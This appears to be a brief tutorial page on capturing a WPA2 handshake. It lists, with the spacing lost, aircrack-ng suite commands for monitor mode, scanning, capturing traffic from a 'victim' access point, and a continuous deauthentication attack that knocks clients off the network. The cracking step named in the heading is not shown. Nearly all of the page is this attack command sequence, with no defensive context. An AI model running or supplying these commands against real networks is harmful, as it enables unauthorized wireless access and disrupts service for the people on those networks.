WPA Handshake Capture
What is the WPA2 handshake
Steps to follow to capture and crack the WPA2 handshake
sudo airmon-ng check killsudo airmon-ng start [interface]sudo airodump-ng [interface]sudo airodump-ng [interface] -d [victim mac adress]sudo airodump-ng -w hack1 -c [victim channel number] --bssid [victim mac adress] [interface]sudo aireplay-ng --deauth 0 -a [victim mac adress] [interface]Other YouTube Tutorials
Last updated